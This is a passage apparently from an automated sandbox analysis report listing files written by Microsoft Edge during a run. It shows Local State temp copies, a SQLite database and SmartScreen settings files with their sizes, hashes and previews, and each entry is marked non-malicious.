                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3be40.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):44455
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.089772247328986
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kW6di1zNtPM9kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynOukzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                MD5:6356EC0D498B0C96EB67C9B703292822
                                                                                                                                                                                                                                                                                                SHA1:04F3FD4D1E2C26E4D515AF619FC43F4648D889AA
                                                                                                                                                                                                                                                                                                SHA-256:D26948D35C2A90233F45991416939161E8062EE802836E5C068A69AFB940C99B
                                                                                                                                                                                                                                                                                                SHA-512:37D6613948326F6775EDF004CF7FE1763904A0FC3FA940BD62722DDC9A745A271BDD59122DDF22860941A5FA235BF5FC51273E4E2019D138CCBC7928CF41E68D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3bfd6.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):44455
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.089772247328986
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kW6di1zNtPM9kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynOukzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                MD5:6356EC0D498B0C96EB67C9B703292822
                                                                                                                                                                                                                                                                                                SHA1:04F3FD4D1E2C26E4D515AF619FC43F4648D889AA
                                                                                                                                                                                                                                                                                                SHA-256:D26948D35C2A90233F45991416939161E8062EE802836E5C068A69AFB940C99B
                                                                                                                                                                                                                                                                                                SHA-512:37D6613948326F6775EDF004CF7FE1763904A0FC3FA940BD62722DDC9A745A271BDD59122DDF22860941A5FA235BF5FC51273E4E2019D138CCBC7928CF41E68D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3e6a8.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):44455
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.089772247328986
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kW6di1zNtPM9kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynOukzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                MD5:6356EC0D498B0C96EB67C9B703292822
                                                                                                                                                                                                                                                                                                SHA1:04F3FD4D1E2C26E4D515AF619FC43F4648D889AA
                                                                                                                                                                                                                                                                                                SHA-256:D26948D35C2A90233F45991416939161E8062EE802836E5C068A69AFB940C99B
                                                                                                                                                                                                                                                                                                SHA-512:37D6613948326F6775EDF004CF7FE1763904A0FC3FA940BD62722DDC9A745A271BDD59122DDF22860941A5FA235BF5FC51273E4E2019D138CCBC7928CF41E68D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF42a77.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):44455
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.089772247328986
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kW6di1zNtPM9kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynOukzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                MD5:6356EC0D498B0C96EB67C9B703292822
                                                                                                                                                                                                                                                                                                SHA1:04F3FD4D1E2C26E4D515AF619FC43F4648D889AA
                                                                                                                                                                                                                                                                                                SHA-256:D26948D35C2A90233F45991416939161E8062EE802836E5C068A69AFB940C99B
                                                                                                                                                                                                                                                                                                SHA-512:37D6613948326F6775EDF004CF7FE1763904A0FC3FA940BD62722DDC9A745A271BDD59122DDF22860941A5FA235BF5FC51273E4E2019D138CCBC7928CF41E68D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4d0ba.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):44455
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.089772247328986
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kW6di1zNtPM9kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynOukzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                MD5:6356EC0D498B0C96EB67C9B703292822
                                                                                                                                                                                                                                                                                                SHA1:04F3FD4D1E2C26E4D515AF619FC43F4648D889AA
                                                                                                                                                                                                                                                                                                SHA-256:D26948D35C2A90233F45991416939161E8062EE802836E5C068A69AFB940C99B
                                                                                                                                                                                                                                                                                                SHA-512:37D6613948326F6775EDF004CF7FE1763904A0FC3FA940BD62722DDC9A745A271BDD59122DDF22860941A5FA235BF5FC51273E4E2019D138CCBC7928CF41E68D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                                                MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                                                SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                                                SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                                                SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):47
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                                MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                                SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                                SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                                SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):35
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                                MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                                SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                                SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                                SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"forceServiceDetermination":false}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):81
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                                MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                                SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                                SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                                SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):130439
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                                MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                                SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                                SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                                SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                                MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                                SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                                SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                                SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):57
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                                MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                                SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                                SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                                SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):29
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                                MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                                SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                                SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                                SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):575056
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.999649474060713
